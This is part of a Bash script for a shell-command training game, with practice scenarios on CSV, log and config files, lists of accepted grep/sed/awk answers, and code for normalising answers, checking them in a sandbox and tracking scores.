Count total TODO/FIXME/HACK markers§grep -rE 'TODO|FIXME|HACK' . | wc -l§grep -r 'TODO\|FIXME\|HACK' . | wc -l§grep -RE 'TODO|FIXME|HACK' . | wc -l§grep -rE 'TODO|FIXME|HACK' . | wc --lines§grep -RE 'TODO|FIXME|HACK' . | wc --lines§grep -rE 'TODO|FIXME|HACK' | wc -l§grep -rE 'TODO|FIXME|HACK' | wc --lines§grep -r 'TODO\|FIXME\|HACK' . | wc --lines§grep -RE 'TODO|FIXME|HACK' | wc -l§grep -RE 'TODO|FIXME|HACK' | wc --lines§grep -r 'TODO\|FIXME\|HACK' | wc -l§grep -r 'TODO\|FIXME\|HACK' | wc --lines#output:4
Show markers with line numbers§grep -rnE 'TODO|FIXME|HACK' .§grep -rn 'TODO\|FIXME\|HACK' .§grep -RnE 'TODO|FIXME|HACK' .§grep -Rn 'TODO\|FIXME\|HACK' .§grep -rnE 'TODO|FIXME|HACK'§grep -RnE 'TODO|FIXME|HACK'§grep -rn 'TODO\|FIXME\|HACK'§grep -Rn 'TODO\|FIXME\|HACK'#output:~TODO
Find the file with FIXME§grep -rl FIXME .§grep -rl FIXME§grep -Rl FIXME .§grep -Rl FIXME§grep --recursive -l FIXME .§grep --recursive -l FIXME§grep -rFl FIXME .§grep -RFl FIXME .§grep -rFl FIXME§grep -RFl FIXME§grep -rwl FIXME .§grep -Rwl FIXME .§grep -rwl FIXME§grep -Rwl FIXME§grep -rli FIXME .§grep -Rli FIXME .§grep -rli FIXME§grep -Rli FIXME#output:~helpers\.py
Find markers only in .py files§grep -rnE 'TODO|FIXME|HACK' --include='*.py' .§grep -rn 'TODO\|FIXME\|HACK' --include='*.py' .§grep -rnE 'TODO|FIXME|HACK' --include='*.py'§grep -RnE 'TODO|FIXME|HACK' --include='*.py' .§grep -rn 'TODO\|FIXME\|HACK' --include='*.py'§grep -RnE 'TODO|FIXME|HACK' --include='*.py'§grep -Rn 'TODO\|FIXME\|HACK' --include='*.py' .§grep -Rn 'TODO\|FIXME\|HACK' --include='*.py'#output:~FIXME
Extract just the marker keywords§grep -roE 'TODO|FIXME|HACK' .§grep -roE 'TODO|FIXME|HACK'§grep -RoE 'TODO|FIXME|HACK' .§grep -RoE 'TODO|FIXME|HACK'§grep -ro 'TODO\|FIXME\|HACK' .§grep -ro 'TODO\|FIXME\|HACK'§grep -Ro 'TODO\|FIXME\|HACK' .§grep -Ro 'TODO\|FIXME\|HACK'#output:~TODO
Save all markers to report.txt§grep -rnE 'TODO|FIXME|HACK' . > report.txt§grep -rn 'TODO\|FIXME\|HACK' . > report.txt§grep -rnE 'TODO|FIXME|HACK' > report.txt§grep -RnE 'TODO|FIXME|HACK' . > report.txt§grep -RnE 'TODO|FIXME|HACK' > report.txt§grep -rn 'TODO\|FIXME\|HACK' > report.txt§grep -Rn 'TODO\|FIXME\|HACK' . > report.txt§grep -Rn 'TODO\|FIXME\|HACK' > report.txt#state:exists:report.txt,contains:report.txt:TODO,lines:report.txt:4
STEPS
}

# --- Scenario 4: Messy CSV ---
_sc_setup_4() {
  local d=$1
  cat > "$d/data.csv" <<'CSV'
id,name,status
3,charlie,active
1,alice,active
2,bob,inactive
1,alice,active
4,dave,active
2,bob,inactive
CSV
}
_sc_steps_4() {
  cat <<'STEPS'
Count data rows (excluding header)§tail -n +2 data.csv | wc -l§sed 1d data.csv | wc -l§tail -n +2 data.csv | wc --lines§sed 1d data.csv | wc --lines§awk 'NR>1' data.csv | wc -l§awk 'NR>1' data.csv | wc --lines§awk 'END{print NR-1}' data.csv#output:~^\s*6\s*$
Find duplicate lines (excluding header)§tail -n +2 data.csv | sort | uniq -d§sed 1d data.csv | sort | uniq -d§tail -n +2 data.csv | sort | uniq --repeated§sed 1d data.csv | sort | uniq --repeated§awk 'NR>1' data.csv | sort | uniq -d§awk 'NR>1' data.csv | sort | uniq --repeated§tail -n +2 data.csv | sort | uniq -D§sed 1d data.csv | sort | uniq -D§awk 'NR>1' data.csv | sort | uniq -D§tail -n +2 data.csv | sort | uniq --all-repeated§sed 1d data.csv | sort | uniq --all-repeated§awk 'NR>1' data.csv | sort | uniq --all-repeated#output:~alice
Sort and deduplicate (keep header)§head -1 data.csv > sorted.csv && tail -n +2 data.csv | sort -t, -k1 -n | uniq >> sorted.csv§(head -1 data.csv; tail -n +2 data.csv | sort -t, -k1,1n | uniq) > sorted.csv§head -1 data.csv > sorted.csv && tail -n +2 data.csv | sort -u >> sorted.csv§(head -1 data.csv; tail -n +2 data.csv | sort -u) > sorted.csv§(head -1 data.csv; tail -n +2 data.csv | sort --unique) > sorted.csv§head -1 data.csv > sorted.csv && tail -n +2 data.csv | sort --unique >> sorted.csv§(head -1 data.csv && tail -n +2 data.csv | sort -u) > sorted.csv#state:lines:sorted.csv:5,line1:sorted.csv:id,name,status
Count active entries in sorted file§grep -cw active sorted.csv§grep -c ',active$' sorted.csv§grep -c ',active' sorted.csv§grep -cF ',active' sorted.csv§grep -w active sorted.csv | wc -l§grep ',active' sorted.csv | wc -l§grep ',active$' sorted.csv | wc -l#output:3
STEPS
}

# --- Scenario 5: The Incident ---
_sc_setup_5() {
  local d=$1
  cat > "$d/server.log" <<'LOG'
2024-01-15 08:00:01 192.168.1.100 GET /index.html 200
2024-01-15 08:01:10 10.10.10.50 POST /login 401
2024-01-15 08:01:15 10.10.10.50 POST /login 401
2024-01-15 08:01:20 10.10.10.50 POST /login 401
2024-01-15 08:01:25 10.10.10.50 POST /login 200
2024-01-15 08:02:00 192.168.1.100 GET /dashboard 200
2024-01-15 08:02:30 10.10.10.50 GET /admin 200
2024-01-15 08:03:00 192.168.1.100 GET /api/status 200
2024-01-15 08:04:00 10.10.10.50 GET /admin/users 200
2024-01-15 08:05:00 192.168.1.100 GET /index.html 200
LOG
}
_sc_steps_5() {
  cat <<'STEPS'
Find the IP with the most requests§awk '{print $3}' server.log | sort | uniq -c | sort -rn | head -1§cut -d' ' -f3 server.log | sort | uniq -c | sort -rn | head -1§awk '{print $3}' server.log | sort | uniq -c | sort -nr | head -1§cut -d' ' -f3 server.log | sort | uniq -c | sort -nr | head -1§cut -d ' ' -f3 server.log | sort | uniq -c | sort -rn | head -1§cut -d ' ' -f3 server.log | sort | uniq -c | sort -nr | head -1#output:~10\.10\.10\.50
Count failed login attempts (401)§grep 401 server.log | wc -l§grep -c 401 server.log§grep 401 server.log | wc --lines§grep -c ' 401' server.log§grep ' 401' server.log | wc -l§grep -cF 401 server.log§grep ' 401' server.log | wc --lines§grep -w 401 server.log | wc -l§grep -cw 401 server.log§grep -F 401 server.log | wc -l§grep -F 401 server.log | wc --lines§grep -w 401 server.log | wc --lines§awk '/401/{c++}END{print c}' server.log§awk '/ 401/{c++}END{print c}' server.log#output:3
Check if the attacker got in (find 200 after 401s from same IP)§grep 10.10.10.50 server.log | grep 200§grep '10.10.10.50.*200' server.log§grep 10.10.10.50 server.log | grep ' 200'§grep -F 10.10.10.50 server.log | grep 200§grep -F 10.10.10.50 server.log | grep -F 200§grep 10.10.10.50 server.log | grep -F 200§grep -w 10.10.10.50 server.log | grep 200§grep -Fw 10.10.10.50 server.log | grep 200§awk '/10.10.10.50/ && /200/' server.log§awk '/10\.10\.10\.50/ && /200/' server.log#output:~login 200
Save all attacker activity to attacker.log§grep 10.10.10.50 server.log > attacker.log§grep '10.10.10.50' server.log > attacker.log§grep -F 10.10.10.50 server.log > attacker.log§grep "10.10.10.50" server.log > attacker.log§grep -Fw 10.10.10.50 server.log > attacker.log§grep -w 10.10.10.50 server.log > attacker.log§grep -E 10.10.10.50 server.log > attacker.log§grep -E '10.10.10.50' server.log > attacker.log§awk '/10.10.10.50/' server.log > attacker.log§awk '/10\.10\.10\.50/' server.log > attacker.log#state:contains:attacker.log:10.10.10.50,lines:attacker.log:6
Count unique IPs in the log§awk '{print $3}' server.log | sort -u | wc -l§awk '{print $3}' server.log | sort | uniq | wc -l§awk '{print $3}' server.log | sort --unique | wc -l§awk '{print $3}' server.log | sort -u | wc --lines§awk '{print $3}' server.log | sort | uniq | wc --lines§cut -d' ' -f3 server.log | sort -u | wc -l§cut -d' ' -f3 server.log | sort --unique | wc -l§cut -d' ' -f3 server.log | sort -u | wc --lines§cut -d' ' -f3 server.log | sort | uniq | wc -l§cut -d' ' -f3 server.log | sort | uniq | wc --lines§cut -d ' ' -f3 server.log | sort -u | wc -l§cut -d ' ' -f3 server.log | sort -u | wc --lines§cut -d ' ' -f3 server.log | sort | uniq | wc -l§cut -d ' ' -f3 server.log | sort | uniq | wc --lines§awk '!seen[$3]++{c++}END{print c}' server.log#output:2
STEPS
}

# --- Scenario 6: The Broken Deploy ---
_sc_setup_6() {
  local d=$1
  chmod 644 "$d/deploy.sh"
  rm -f "$d/VERSION"
  printf '[server]\nhost=CHANGEME\nport=0\n' > "$d/config.ini"
}
_sc_steps_6() {
  cat <<'STEPS'
Check permissions on deploy.sh§ls -l deploy.sh§ls -la deploy.sh§ls -ld deploy.sh§ls -lh deploy.sh§stat deploy.sh#output:~-rw-r--r--
Make deploy.sh executable§chmod +x deploy.sh§chmod 755 deploy.sh§chmod u+x deploy.sh§chmod a+x deploy.sh§chmod 0755 deploy.sh§chmod 775 deploy.sh§chmod 0775 deploy.sh§chmod ugo+x deploy.sh#state:perm:deploy.sh:x
Create VERSION file with "1.0"§echo 1.0 > VERSION§echo '1.0' > VERSION§echo "1.0" > VERSION§printf '1.0\n' > VERSION§printf "1.0\n" > VERSION§printf '%s\n' 1.0 > VERSION#state:contains:VERSION:1.0,lines:VERSION:1
Backup config.ini before editing§cp config.ini config.ini.bak§cp -p config.ini config.ini.bak§cp -- config.ini config.ini.bak§cp -a config.ini config.ini.bak#state:exists:config.ini.bak
Fix the host in config.ini to localhost§sed -i 's/host=CHANGEME/host=localhost/' config.ini§sed -i 's/host=CHANGEME/host=localhost/g' config.ini§sed -i 's/CHANGEME/localhost/' config.ini§sed -i 's/CHANGEME/localhost/g' config.ini§sed -i -e 's/host=CHANGEME/host=localhost/' config.ini§sed -i -e 's/host=CHANGEME/host=localhost/g' config.ini§sed -i -e 's/CHANGEME/localhost/' config.ini§sed -i -e 's/CHANGEME/localhost/g' config.ini§sed --in-place 's/host=CHANGEME/host=localhost/' config.ini§sed --in-place 's/CHANGEME/localhost/' config.ini#state:contains:config.ini:host=localhost,!contains:config.ini:CHANGEME
Fix the port in config.ini to 8080§sed -i 's/port=0/port=8080/' config.ini§sed -i 's/port=0/port=8080/g' config.ini§sed -i '/port/s/0/8080/' config.ini§sed -i -e 's/port=0/port=8080/' config.ini§sed -i -e 's/port=0/port=8080/g' config.ini§sed -i '/port/s/0/8080/g' config.ini§sed -i -e '/port/s/0/8080/' config.ini§sed -i -e '/port/s/0/8080/g' config.ini§sed --in-place 's/port=0/port=8080/' config.ini§sed --in-place 's/port=0/port=8080/g' config.ini#state:contains:config.ini:port=8080,!contains:config.ini:port=0
Run the deploy script§./deploy.sh§bash deploy.sh§sh deploy.sh§source deploy.sh§. deploy.sh§. ./deploy.sh§source ./deploy.sh#output:~Deploy complete
STEPS
}

# --- Scenario 7: Log Emergency ---
_sc_setup_7() {
  local d=$1
  cat > "$d/app.log" <<'LOG'
2024-01-15 08:00:01 INFO Application started
2024-01-15 08:01:12 ERROR Connection refused to database
2024-01-15 08:01:15 ERROR Connection refused to database
2024-01-15 08:02:30 WARN Disk usage at 85%
2024-01-15 08:03:01 INFO Health check passed
2024-01-15 08:03:45 ERROR Connection refused to database
2024-01-15 08:04:10 ERROR Database error: timeout
2024-01-15 08:04:30 WARN Memory usage high
2024-01-15 08:05:00 INFO Retry succeeded
2024-01-15 08:05:30 ERROR Connection refused to database
LOG
}
_sc_steps_7() {
  cat <<'STEPS'
Count the ERROR lines in app.log§grep -c ERROR app.log§grep --count ERROR app.log§grep -cF ERROR app.log§grep -cw ERROR app.log§grep -cE ERROR app.log§grep ERROR app.log | wc -l§grep ERROR app.log | wc --lines#output:5
Find the most common error message§grep ERROR app.log | sed 's/.* ERROR //' | sort | uniq -c | sort -rn | head -1§grep ERROR app.log | cut -d' ' -f4- | sort | uniq -c | sort -rn | head -1§grep ERROR app.log | cut -d' ' -f4- | sort | uniq -c | sort -nr | head -1§grep ERROR app.log | sed 's/.* ERROR //' | sort | uniq -c | sort -nr | head -1#output:~Connection refused
Save all ERROR lines to errors.txt§grep ERROR app.log > errors.txt§grep -F ERROR app.log > errors.txt§grep -w ERROR app.log > errors.txt§grep -E ERROR app.log > errors.txt§grep 'ERROR' app.log > errors.txt#state:contains:errors.txt:ERROR,lines:errors.txt:5
Count unique error types§grep ERROR app.log | sed 's/.* ERROR //' | sort -u | wc -l§grep ERROR app.log | cut -d' ' -f4- | sort -u | wc -l§grep ERROR app.log | sed 's/.* ERROR //' | sort --unique | wc -l§grep ERROR app.log | sed 's/.* ERROR //' | sort -u | wc --lines§grep ERROR app.log | cut -d' ' -f4- | sort --unique | wc -l§grep ERROR app.log | cut -d' ' -f4- | sort -u | wc --lines#output:2
Remove all ERROR lines from app.log§sed -i '/ERROR/d' app.log§sed -i -e '/ERROR/d' app.log§sed --in-place '/ERROR/d' app.log§sed --in-place -e '/ERROR/d' app.log§grep -v ERROR app.log > tmp && mv tmp app.log§grep -vF ERROR app.log > tmp && mv tmp app.log§grep -vw ERROR app.log > tmp && mv tmp app.log§grep -vE ERROR app.log > tmp && mv tmp app.log§awk '!/ERROR/' app.log > tmp && mv tmp app.log#state:lines:app.log:5,!contains:app.log:ERROR
STEPS
}

# --- Scenario 8: Config Surgery ---
_sc_setup_8() {
  local d=$1
  cat > "$d/config.ini" <<'CFG'
[general]
app_name=myapp
debug=true
version=2.1

[database]
host=localhost
port=5432
password=hunter2

[logging]
level=DEBUG
file=/var/log/app.log
rotate=daily
CFG
}
_sc_steps_8() {
  cat <<'STEPS'
Find the debug setting§grep debug config.ini§grep -i debug config.ini§grep -n debug config.ini§grep -ni debug config.ini§grep -F debug config.ini§grep -nF debug config.ini§grep -w debug config.ini§grep -nw debug config.ini§grep -iF debug config.ini§grep -Fw debug config.ini#output:~debug=true
Disable debug mode (set to false)§sed -i 's/debug=true/debug=false/' config.ini§sed -i 's/debug=true/debug=false/g' config.ini§sed -i '/debug/s/true/false/' config.ini§sed -i '/debug/s/true/false/g' config.ini§sed -i '/^debug/s/true/false/' config.ini§sed -i 's/true/false/' config.ini§sed -i 's/true/false/g' config.ini§sed -i -e 's/debug=true/debug=false/' config.ini§sed -i -e 's/debug=true/debug=false/g' config.ini§sed -i -e '/debug/s/true/false/' config.ini§sed -i -e '/debug/s/true/false/g' config.ini§sed -i -e '/^debug/s/true/false/' config.ini§sed --in-place 's/debug=true/debug=false/' config.ini§sed --in-place 's/true/false/' config.ini§sed --in-place '/debug/s/true/false/' config.ini#state:contains:config.ini:debug=false,!contains:config.ini:debug=true
Find the plaintext password§grep password config.ini§grep -i password config.ini§grep -n password config.ini§grep -ni password config.ini§grep hunter2 config.ini§grep -F password config.ini§grep -nF password config.ini§grep -w password config.ini§grep -nw password config.ini§grep password= config.ini#output:~password=hunter2
Remove the password line§sed -i '/password/d' config.ini§sed -i '/^password/d' config.ini§sed -i '/password=hunter2/d' config.ini§sed -i '/hunter2/d' config.ini§sed -i '/^password=/d' config.ini§sed -i -e '/password/d' config.ini§sed -i -e '/^password/d' config.ini§sed -i -e '/password=hunter2/d' config.ini§sed -i -e '/hunter2/d' config.ini§sed -i -e '/^password=/d' config.ini§grep -v password config.ini > tmp && mv tmp config.ini§grep -vF password config.ini > tmp && mv tmp config.ini§grep -vw password config.ini > tmp && mv tmp config.ini§awk '!/password/' config.ini > tmp && mv tmp config.ini§sed --in-place '/password/d' config.ini§sed --in-place '/^password/d' config.ini#state:!contains:config.ini:password
Fix log level to INFO§sed -i 's/level=DEBUG/level=INFO/' config.ini§sed -i 's/DEBUG/INFO/' config.ini§sed -i 's/level=DEBUG/level=INFO/g' config.ini§sed -i '/level/s/DEBUG/INFO/' config.ini§sed -i 's/DEBUG/INFO/g' config.ini§sed -i -e 's/level=DEBUG/level=INFO/' config.ini§sed -i -e 's/level=DEBUG/level=INFO/g' config.ini§sed -i '/level/s/DEBUG/INFO/g' config.ini§sed -i -e '/level/s/DEBUG/INFO/' config.ini§sed -i -e '/level/s/DEBUG/INFO/g' config.ini§sed -i -e 's/DEBUG/INFO/' config.ini§sed -i -e 's/DEBUG/INFO/g' config.ini§sed --in-place 's/level=DEBUG/level=INFO/' config.ini§sed --in-place 's/DEBUG/INFO/' config.ini#state:contains:config.ini:level=INFO,!contains:config.ini:level=DEBUG
STEPS
}

declare -A _LEVEL_CACHE=() _LEVEL_CACHE_N=() _LEVEL_ITEMS=() _LAST_PICK=()

declare -a CURRENT_QUESTIONS=()
generate_level() {
  local level=$1
  CURRENT_QUESTIONS=()
  gen_level${level}  # writes directly via nameref
  local IFS=$'\n'; _LEVEL_CACHE[$level]="${CURRENT_QUESTIONS[*]}"

  # Mix in weak questions from previous levels (unmastered first)
  if ((level > 1)) && declare -p _sc &>/dev/null 2>&1; then
    local _weak=() _rest=() _cache_tmp=() _line _qp prev
    for ((prev=1; prev<level; prev++)); do
      if [[ -z "${_LEVEL_CACHE[$prev]:-}" ]]; then
        _cache_tmp=(); gen_level${prev} _cache_tmp
        IFS=$'\n'; _LEVEL_CACHE[$prev]="${_cache_tmp[*]}"
      fi
      while IFS= read -r _line; do
        [[ -z "$_line" ]] && continue
        _qparse "$_line"; _sget "$_qprompt"
        ((REPLY < 2)) && _weak+=("$_line") || _rest+=("$_line")
      done <<< "${_LEVEL_CACHE[$prev]}"
    done
    _fshuffle _weak; _fshuffle _rest
    # Take up to MIX_PER_LEVEL * (level-1) questions, weak first
    local _want=$(( MIX_PER_LEVEL * (level - 1) )) _got=0
    for _line in "${_weak[@]}" "${_rest[@]}"; do
      ((_got >= _want)) && break
      CURRENT_QUESTIONS+=("$_line"); ((_got++))
    done
  fi
}

# ═══ ANSWER CHECK ═══
_fnorm() {
  [[ -z "$1" ]] && { REPLY=""; return; }
  # Handle pipes: normalize each segment independently (protect || from splitting)
  if [[ "$1" == *'|'* ]]; then
    local _segs _s _r="" _pg="${1//||/$'\x01'}"
    if [[ "$_pg" == *'|'* ]]; then
      IFS='|' read -ra _segs <<< "$_pg"
      for _s in "${_segs[@]}"; do
        _s="${_s//$'\x01'/||}"; _trim "$_s"; _s=$REPLY
        [[ -z "$_s" ]] && continue
        _fnorm "$_s"
        [[ -n "$_r" ]] && _r+=" | "
        _r+="$REPLY"
      done
      REPLY="$_r"; return
    fi
  fi
  local parts flags=() args=() postdd=() p
  read -ra parts <<< "$1"
  # Preprocess: split on ; boundaries (cmd; cmd2 → cmd ; cmd2)
  local _semi=() _sp
  for _sp in "${parts[@]}"; do
    if [[ "$_sp" == *';'* && "$_sp" != ';' ]]; then
      local _pre="${_sp%%;*}" _post="${_sp#*;}"
      [[ -n "$_pre" ]] && _semi+=("$_pre")
      _semi+=(";")
      [[ -n "$_post" ]] && _semi+=("$_post")
    else _semi+=("$_sp"); fi
  done
  parts=("${_semi[@]}")
  # Preprocess: split combined redirect tokens (>file → > file, 2>/dev/null → 2> /dev/null)
  local _redir='^(2>>|2>|>>|>&|&>|1>|>|<)([^<>&(].*)$' _pp=()
  for p in "${parts[@]}"; do
    if [[ "$p" =~ $_redir ]]; then
      _pp+=("${BASH_REMATCH[1]}" "${BASH_REMATCH[2]}")
    else _pp+=("$p"); fi
  done
  parts=("${_pp[@]}")
  # Strip quotes for normalization (handles 'x' vs "x" vs x, -F',' vs -F,)
  local _qi _qv
  for _qi in "${!parts[@]}"; do
    _qv="${parts[$_qi]}"
    if [[ ${#_qv} -ge 2 && "${_qv:0:1}" == "'" && "${_qv: -1}" == "'" ]]; then
      parts[$_qi]="${_qv:1:${#_qv}-2}"
    elif [[ ${#_qv} -ge 2 && "${_qv:0:1}" == '"' && "${_qv: -1}" == '"' ]]; then
      parts[$_qi]="${_qv:1:${#_qv}-2}"
    elif [[ "$_qv" == -* ]]; then
      parts[$_qi]="${_qv//\'/}"; parts[$_qi]="${parts[$_qi]//\"/}"
    fi
  done
  # Preprocess: split -n5 → -n 5 (single letter flag glued to digits)
  local _sf=() _sp
  for _sp in "${parts[@]}"; do
    if [[ "$_sp" =~ ^-([a-zA-Z])([+]?[0-9]+)$ ]]; then
      _sf+=("-${BASH_REMATCH[1]}" "${BASH_REMATCH[2]}")
    elif [[ "$_sp" =~ ^-([a-zA-Z])([^a-zA-Z\ -].*)$ ]]; then
      _sf+=("-${BASH_REMATCH[1]}" "${BASH_REMATCH[2]}")
    elif [[ "$_sp" =~ ^(--[a-zA-Z][-a-zA-Z]*)=(.+)$ ]]; then
      _sf+=("${BASH_REMATCH[1]}" "${BASH_REMATCH[2]}")
    else _sf+=("$_sp"); fi
  done
  parts=("${_sf[@]}")
  REPLY="${parts[0]}"
  local _saw_dashdash=0
  for p in "${parts[@]:1}"; do
    if ((_saw_dashdash)); then postdd+=("$p")
    elif [[ "$p" == "--" ]]; then _saw_dashdash=1
    elif [[ "$p" == -* ]]; then
      [[ "$p" =~ ^-[a-zA-Z]+$ && ${#p} -gt 2 ]] && { for ((j=1;j<${#p};j++)); do flags+=("-${p:j:1}"); done; } || flags+=("$p")
    else args+=("$p"); fi
  done
  # Normalize head/tail: -N → -n N, --lines → -n
  if [[ "$REPLY" == head || "$REPLY" == tail ]]; then
    local _nf=() _f
    for _f in "${flags[@]}"; do
      if [[ "$_f" =~ ^-([0-9]+)$ ]]; then
        _nf+=("-n"); args=("${BASH_REMATCH[1]}" "${args[@]}")
      elif [[ "$_f" == "--lines" ]]; then
        _nf+=("-n")
      else _nf+=("$_f"); fi
    done
    flags=("${_nf[@]}")
  fi
  # Strip ./ prefix from non-flag args
  local _ai
  for _ai in "${!args[@]}"; do
    [[ "${args[$_ai]}" == ./* ]] && args[$_ai]="${args[$_ai]#./}"
  done
  # Normalize tar: sort bundled option chars (xzf == fxz == zxf)
  if [[ "$REPLY" == tar && ${#args[@]} -gt 0 && "${args[0]}" =~ ^[a-zA-Z]+$ ]]; then
    local _tca=() _ti _tj _tt _tr=""
    for ((_ti=0; _ti<${#args[0]}; _ti++)); do _tca+=("${args[0]:_ti:1}"); done
    for ((_ti=1; _ti<${#_tca[@]}; _ti++)); do
      _tt="${_tca[$_ti]}"
      for ((_tj=_ti; _tj>0; _tj--)); do [[ "${_tca[$((_tj-1))]}" > "$_tt" ]] || break; _tca[$_tj]="${_tca[$((_tj-1))]}"; done
      _tca[$_tj]="$_tt"
    done
    for _ti in "${_tca[@]}"; do _tr+="$_ti"; done; args[0]="$_tr"
  fi
  local i j tmp
  for ((i=1; i<${#flags[@]}; i++)); do
    tmp="${flags[$i]}"
    for ((j=i; j>0; j--)); do [[ "${flags[$((j-1))]}" > "$tmp" ]] || break; flags[$j]="${flags[$((j-1))]}"; done
    flags[$j]="$tmp"
  done
  ((${#flags[@]})) && { for p in "${flags[@]}"; do REPLY+=" $p"; done; }
  ((${#args[@]})) && { for p in "${args[@]}"; do REPLY+=" $p"; done; }
  ((_saw_dashdash)) && { REPLY+=" --"; for p in "${postdd[@]}"; do REPLY+=" $p"; done; }
}

_SANDBOX_OUTPUT="" _SANDBOX_REQUIRE_FAIL=0
_sandbox_validate() {
  local inp=$1 output _sb_err _sb_rc _req_fail=0
  [[ -n "$_qrequire" && "$inp" != *"$_qrequire"* ]] && _req_fail=1
  _SANDBOX_REQUIRE_FAIL=0
  { output=$(_sandbox_exec "$inp" 5 2>"$SANDBOX_DIR/.stderr"); } 2>/dev/null; _sb_rc=$?
  _sb_err=$(<"$SANDBOX_DIR/.stderr") 2>/dev/null || _sb_err=""
  _SANDBOX_OUTPUT="${output}${_sb_err:+$'\n'$_sb_err}"
  _is_destructive "$inp" && _SANDBOX_DESTRUCTIVE=1
  # Reject command-not-found (127) and cannot-execute (126)
  ((_sb_rc == 127 || _sb_rc == 126)) && { ((_req_fail)) && _SANDBOX_REQUIRE_FAIL=1; return 1; }
  local _out_ok=0 _st_ok=0
  [[ -n "$_qoutput" ]] && _sandbox_check_output "$output" "$_qoutput" && _out_ok=1
  [[ -n "$_qstate" ]] && _sandbox_check_state "$_qstate" && _st_ok=1
  local _would_pass=0
  if [[ -n "$_qoutput" && -n "$_qstate" ]]; then
    ((_out_ok && _st_ok)) && _would_pass=1
  elif ((_out_ok || _st_ok)); then
    _would_pass=1
  fi
  if ((_req_fail)); then
    # 2 = right command, wrong string; 1 = just wrong
    _SANDBOX_REQUIRE_FAIL=$((_would_pass ? 2 : 1))
    return 1
  fi
  ((_would_pass)) && return 0
  return 1
}

_text_match() {
  local inp=$1 ninp=$2 answers=$3 delim=$4 a b
  local -a opts; IFS="$delim" read -ra opts <<< "$answers"
  for a in "${opts[@]}"; do
    _trim "$a"; b=$REPLY
    [[ -z "$b" ]] && continue
    if [[ "$b" == ~* ]]; then
      local _pat="${b:1}"; [[ "$inp" =~ ${_pat} ]] && return 0
    else
      _fnorm "$b"; [[ "$inp" == "$b" || "$ninp" == "$REPLY" ]] && return 0
    fi
  done; return 1
}

check() {
  _trim "$1"; local inp=$REPLY; _fnorm "$inp"; local ninp=$REPLY
  _SANDBOX_OUTPUT="" _SANDBOX_REQUIRE_FAIL=0
  ((SANDBOX_MODE && !_qtext)) && _sandbox_validate "$inp" && return 0
  _SANDBOX_REQUIRE_FAIL=0
  _text_match "$inp" "$ninp" "$2" "$_qdelim"
}

_show_alts() {
  ((OPT_ALTS)) || return 0
  local inp=$1 answers=$2 delim=$3
  _fnorm "$inp"; local ninp=$REPLY
  local -a opts shown=()
  IFS="$delim" read -ra opts <<< "$answers"
  local a b max=3
  for a in "${opts[@]}"; do
    _trim "$a"; b=$REPLY
    [[ -z "$b" || "$b" == ~* ]] && continue
    _fnorm "$b"
    [[ "$inp" == "$b" || "$ninp" == "$REPLY" ]] && continue
    shown+=("$b")
    ((${#shown[@]} >= max)) && break
  done
  ((${#shown[@]})) || return 0
  printf '  %s\n' "${D}Also:${N}"
  local a; for a in "${shown[@]}"; do
    printf '    %s\n' "${D}$a${N}"
  done
}

LVL=1 QI=0 TOT=0
load() {
  [[ -f "$DATA/session.json" ]] && {
    local fd t; exec {fd}<>"$DATA/session.lock"; flock -s "$fd"
    t=$(<"$DATA/session.json")
    exec {fd}>&-
    LVL="${t#*\"level\":}"; LVL="${LVL%%[!0-9]*}"
    [[ "$t" == *'"qi":'* ]] && { QI="${t#*\"qi\":}"; QI="${QI%%[!0-9]*}"; }
  }
  LVL=${LVL:-1}; QI=${QI:-0}
  ((LVL < 1)) && LVL=1  # migrate old 0-indexed sessions
  ((LVL > MAX_LEVEL)) && LVL=$MAX_LEVEL
}
save() {
  local fd; exec {fd}>"$DATA/session.lock"; flock -x "$fd"
  printf '{"level":%d,"qi":%d}\n' "$LVL" "$QI" > "$DATA/session.json.tmp"
  mv "$DATA/session.json.tmp" "$DATA/session.json"
  exec {fd}>&-
}
# ═══ SCORING & UI ═══
declare -A _HASH_CACHE=()
_hash() {
  local key="$1"
  if [[ -n "${_HASH_CACHE[$key]:-}" ]]; then REPLY="${_HASH_CACHE[$key]}"; return; fi
  local h=5381 i c
  for ((i=0; i<${#key}; i++)); do
    printf -v c '%d' "'${key:i:1}"
    h=$(( ((h << 5) + h + c) & 0xFFFFFFFF ))
  done
  printf -v REPLY '%08x' "$h"
  _HASH_CACHE[$key]="$REPLY"
}
norm() {
  local -n _arr=$1; local i j tmp
  for ((i=1; i<${#_arr[@]}; i++)); do
    tmp="${_arr[$i]}"; j=$i
    while ((j > 0)) && [[ "${_arr[$((j-1))]}" > "$tmp" ]]; do
      _arr[$j]="${_arr[$((j-1))]}"; ((j--))
    done
    _arr[$j]="$tmp"
  done
}
_sflush() {
  local _fd; exec {_fd}>"$DATA/scores.lock"; flock -x "$_fd"
  { printf '#v1\n'; local _keys=("${!_sc[@]}"); norm _keys; for k in "${_keys[@]}"; do printf '%s|%s\n' "$k" "${_sc[$k]}"; done; } > "$DATA/scores.tmp"
  mv "$DATA/scores.tmp" "$DATA/scores"
  exec {_fd}>&-
}

_calc_mastery() {
  local -n _src=$1; _cm_seen=0 _cm_t1=0 _cm_t2=0 _cm_tagged=0
  for k in "${!_src[@]}"; do
    local _val="${_src[$k]}" _tier _lvtag
    _tier="${_val%%|*}"
    if [[ "$_val" == *"|"* ]]; then _lvtag="${_val#*|}"; _lvtag="${_lvtag%%|*}"; _cm_tagged=1
    else _lvtag=""; fi
    case "$_tier" in 0|1) ((_cm_t1++));; *) ((_cm_t2++));; esac
    ((_cm_seen++))
    [[ -n "$_lvtag" ]] && {
      lv_total[$_lvtag]=$(( ${lv_total[$_lvtag]:-0} + 1 ))
      [[ "$_tier" != "0" && "$_tier" != "1" ]] && lv_mastered[$_lvtag]=$(( ${lv_mastered[$_lvtag]:-0} + 1 ))
    }
  done
}

stats() {
  local -A sc; [[ -f "$DATA/scores" ]] && while IFS='|' read -r k v; do [[ "$k" == "#"* ]] && continue; sc[$k]=$v; done < "$DATA/scores"
  printf '%s\n' "${W}${B}${PLAYER_NAME:-anon}${N}"
  printf '%s\n\n' "${D}Stats show unique prompts seen${N}"
  local -A lv_total lv_mastered; _calc_mastery sc
  printf 'Total: %s  %s learning  %s mastered\n\n' "${B}${_cm_seen}${N}" "${Y}${_cm_t1}${N}" "${G}${_cm_t2}${N}"
  local BAR_W=10
  for lv in {1..30}; do
    local lt=${lv_total[$lv]:-0} lm=${lv_mastered[$lv]:-0}
    local boss_mark=""
    if ((lv <= BOSS_BEATEN)); then
      ((lv <= PLACED_THROUGH)) && boss_mark="${C}p${N}" || boss_mark="${G}+${N}"
    else boss_mark="${D}·${N}"; fi
    if ((lt > 0)); then
